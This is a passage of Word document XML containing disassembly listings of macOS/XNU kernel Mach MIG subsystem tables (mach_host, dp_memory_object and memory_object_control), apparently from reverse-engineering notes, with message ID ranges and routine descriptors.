        <w:t>__const:FFFFFF8000E03420                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dd 9                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 db 0B4h, 3, 2 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dq 3B4h                 ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dd 3A1140h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dq 0Bh                  ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03420                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0C8E" w:rsidRPr="00FE0C8E" w:rsidRDefault="00FE0C8E" w:rsidP="00FE0C8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0C8E">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 public mach_host_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0067185B">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="0067185B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p_memory_object_subsystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 public dp_memory_object_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390 ; const dp_memory_object_subsystem dp_memory_object_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390 dp_memory_object_subsystem_0 dq offset memory_object_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                                         ; DATA XREF: memory_object_server_routine:loc_FFFFFF80003AE6D2o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04390                                         ; memory_object_server+80o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E04390                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>898h</w:t>
      </w:r>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E04390                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8A2h</w:t>
      </w:r>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 38h                  ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq offset _Xmemory_object_init; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 3                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 2Ch                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 3AE8E000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 1                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 db 2Ch, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 2Ch                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 3AEA30h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 6                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04390                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 2C00000000h          ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 3AEBA0h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 9FFFFFF80h           ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dq 38h                  ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04390                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRDefault="0067185B" w:rsidP="00F07003">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emory_object_control_subsystem</w:t>
      </w:r>
      <w:r w:rsidR="00F07003">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                 public memory_object_control_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540 ; const memory_object_control_subsystem memory_object_control_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540 memory_object_control_subsystem_0 dq offset memory_object_control_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                                         ; DATA XREF: memory_object_control_server_routine:loc_FFFFFF80003AFA62o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04540                                         ; memory_object_control_server+80o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E04540                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="008A3F20">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7D0h</w:t>
      </w:r>
      <w:r w:rsidRPr="0067185B">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067185B" w:rsidRPr="0067185B" w:rsidRDefault="0067185B" w:rsidP="0067185B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
